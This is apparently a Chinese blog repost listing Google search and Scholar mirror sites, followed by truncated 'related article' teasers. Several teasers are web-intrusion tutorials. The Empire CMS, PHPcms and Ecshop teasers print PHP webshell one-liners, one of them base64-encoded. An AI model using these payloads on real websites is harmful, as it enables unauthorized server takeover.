google国内镜像网址收集

搞IT的遇到问题,光靠baidu有时真的解决不了问题,所以时不时的就需要求助google😂,
里面有好多国外网友的博客、stackoverflow、github issues、官方文档等等的大量一手英文资料,
但是因为种种原因国家一直不放开Google搜索的使用,之前也搞过好多ghelper、免费代理啥的最后都失效了😭,
如果你想要用Google查询一些科学文献或者技术资料,那么使用Google镜像站(网页/学术)就基本可以实现。

谷歌镜像站是不定期爬取Google搜索中的合法数据,然后再部署到国内的云服务器上,
给国内的网友提供合法的搜索和查询服务,这种方式是非违规的信息获取渠道,
整理如下镜像网站:

谷歌搜索镜像

站点① : https://www.google-fix.com/ (原生态Google内容,但打开速度较慢)

站点② : http://scholar.hedasudi.com/

站点③ : https://ac.scmor.com/

站点④:https://g.vovososo.com/

谷歌学术镜像

站点① : https://xueshu.lanfanshu.cn/

站点② : https://xue.glgoo.net/

站点③ : http://scholar.hedasudi.com/

如上最常用的就是 https://www.google-fix.com/ ,解决了我好多问题😁。
在这里插入图片描述

最近发现 https://www.google-fix.com/不好用了,目前就用https://g.vovososo.com/顶着
在这里插入图片描述
在这里插入图片描述

</article>

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/358311.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

mongo-express 远程代码执行漏洞(CVE-2019-10758)

前言 mongo-express是一款mongodb的第三方Web界面&#xff0c;使用node和express开发。如果攻击者可以成功登录&#xff0c;或者目标服务器没有修改默认的账号密码&#xff08;admin:pass&#xff09;&#xff0c;则可以执行任意node.js代码。 影响版本 mongo-express&#xff…

【转】深入浅出PageRank算法

原文链接 http://segmentfault.com/a/1190000000711128 PageRank算法 PageRank算法是谷歌曾经独步天下的“倚天剑”&#xff0c;该算法由Larry Page和Sergey Brin在斯坦福大学读研时发明的&#xff0c; 论文点击下载: The PageRank Citation Ranking: Bringing Order to the We…

https://blog.csdn.net/weixin_40412037/article/details/112235003

一、工具简介 说明&#xff1a; 这是一款基于主机的漏洞扫描工具&#xff0c;采用多线程确保可以快速的请求数据&#xff0c;采用线程锁可以在向sqlite数据库中写入数据避免database is locked的错误&#xff0c;采用md5哈希算法确保数据不重复插入。 本工具查找是否有公开e…

前端工程师能力评估测试题(2020最新版附答案及解析)

1.下列哪个样式定义后,内联(非块状)元素可以定义宽度和高度 (C) A.display:inline B.display:none C.display:block D.display:inherit 解析 2.css属性overflow属性定义溢出元素内容区的内容会如何处理。如果值为 scroll,不论是否需要,用户代理都会提供一种滚动机…

Cobalt strike加载插件出现乱码

问题描述 插件 加载成功出现乱码 解决方法 在Cobalt strike目录下执行命令指定编码打开客户端解决。 java -Dfile.encodingutf-8 -XX:ParallelGCThreads4 -XX:AggressiveHeap -XX:UseParallelGC -Xms512M -Xmx1024M -jar cobaltstrike.jar1 成功解决

MariaDb数据库管理系统的学习(一)安装示意图

MariaDB数据库管理系统是MySQL的一个分支。主要由开源社区在维护&#xff0c;採用GPL授权许可。开发这个分支的原因之中的一个是&#xff1a;甲骨文公司收购了MySQL后&#xff0c;有将MySQL闭源的潜在风险&#xff0c;因此社区採用分支的方式来避开这个风险。 MariaDB的目的是全…

Ubuntu 安装msfconsole

Ubuntu 安装msfconsole 1.进入到opt目录下 cd /opt/1 2.下载安装文件 msfupdate.erb sudo wget https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb1 3.将文件msfupdate.erb重命名为msfinstal…

为什么需要多线程

对于这个问题可能很多朋友会说是为了高性能&#xff0c;个人觉得这是误解&#xff0c;多线程不等于高性能&#xff0c;从cpu&#xff08;单核&#xff09;的角度上看单线程才能带来最高性能。 对于单纯的运算任务来说一条线程依次执行到底肯定是最快速的&#xff08;因为线程间…

PhpMyAdmin后台getshell

PhpMyAdmin简介 PhpMyAdmin 是一个以PHP为基础&#xff0c;以Web-Base方式架构在网站主机上的MySQL的数据库管理工具&#xff0c;让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径&#xff0c;尤其要处理大量资料的汇入及汇出…

谷歌浏览器如何将繁体字设置成中文?

今天刚拿到公司发给我的电脑,这个电脑是戴尔的,不知道用了多少年啦,处理器是i3的,CPU8+50O还行,总体感觉一般,不卡顿,办公的地方网速跟蜗牛一样,整个电脑应该是重置过的或者重装了系统,作为开发下载常用的浏览器(谷歌、火狐、IE)、编译器、IM工具等还是很有必要的,…

红队技巧-域渗透的协议利用

1.pth(hash传递) 1.1 PTH简介 哈希传递(pth)攻击是指攻击者可以通过捕获密码的hash值(对应着密码的值),然后简单地将其传递来进行身份验证&#xff0c;以此来横向访问其他网络系统&#xff0c;攻击者无须通过解密hash值来获取明文密码&#xff0c;因为对于每个Session hash值都…

你这么喜欢敲代码,那么技术的乐趣在哪里?

在中国的技术圈子里,流行着这样一种说法:过了三十五岁,就一定得改行。在技术飞速发展的今天,只要稍不留神,就会掉下队来。因此,诸多技术工作者在仔细权衡利弊之后,终于还是决定跳离技术这个是非之地,将工作机会让给那些更青春更朝气的年轻一辈们。 当然,还是有相当一部…

Veil生成免杀payload 渗透win10 获取靶机shell

一&#xff1a;实验环境 两台机器处于同网段 攻击机&#xff1a;kali 192.168.115.134 靶机&#xff1a;win10 192.168.115.1 二&#xff1a;Veil下载、安装、使用 kali里默认没有安装Veil&#xff0c;我们通过命令行安装&#xff1a; apt-get update && apt-get inst…

微信公众平台消息接口开发 小黄鸡(小贱鸡)机器人 微信公众平台 公众号聊天机器人 ,消息,接口,小黄鸡,小贱鸡,机器人...

第一部分 基于模拟请求的方式 一、模拟请求数据 先看一下小黄鸡的网页版界面 我们通过模拟http请求来实现&#xff0c;上面对话抓包如下&#xff1a; 发送消息的包 接收消息的包&#xff1a; 根据上面的包&#xff0c;模拟发起请求如下&#xff1a; 二、与微信对接 小黄鸡还可以…

帝国CMS后台getshell

后台新增页面&#xff0c;写入webshell <?php fputs(fopen("shell.php","a"),<?php phpinfo();eval($_POST[cmd]);?>)?>在后台查看文件写入成功 访问成功 shell工具连接成功

如何有效地编写方法

本文是我们名为“ 高级Java ”的学院课程的一部分。 本课程旨在帮助您最有效地使用Java。 它讨论了高级主题&#xff0c;包括对象创建&#xff0c;并发&#xff0c;序列化&#xff0c;反射等。 它将指导您完成Java掌握的过程&#xff01; 在这里查看 &#xff01; 目录 1.简…

PHPcms框架的Webshell

登录界面 后台网址 www.phpcms.com/admin.php 进入主页面 代码注入拿webshell 接下来 我直接就上图了 写入一句话木马 <?php file_put_contents(ooo.php,base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2FhXSk7Pz4)); ?>查看专题 继续添加第二个专题 利用burpsuit拦截…

Ecshop框架的Webshell

一、登录情况 后台地址&#xff1a;127.0.0.1/ecshop/admin 因为后台没有放东西 嘛 所以就啥也没有 二、后台拿webshell三种思路演示 1&#xff1a;执行数据库命令拿webshell 首先需要找到可写入命令的页面&#xff1a; select <;?php eval($_POST[1])?>; into ou…